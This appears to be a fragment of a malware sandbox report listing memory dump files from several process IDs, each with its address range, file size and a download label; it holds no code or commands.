      • memory/1896-180-0x00000000007C0000-0x00000000007CC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/1896-176-0x0000000000580000-0x000000000058C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/1896-164-0x00000000000F0000-0x00000000002F4000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1896-166-0x0000000000510000-0x000000000051E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1896-174-0x0000000000530000-0x000000000053E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1896-178-0x0000000000590000-0x000000000059E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1896-170-0x0000000000560000-0x0000000000578000-memory.dmp

        Filesize

        96KB

        Download

      • memory/2600-221-0x0000000001000000-0x0000000001204000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/2728-200-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2728-201-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2840-236-0x0000000001F80000-0x0000000001F88000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2840-235-0x000000001B460000-0x000000001B742000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2968-147-0x000000001C630000-0x000000001C826000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/2968-140-0x00000000008F0000-0x00000000009E8000-memory.dmp

        Filesize

        992KB

        Download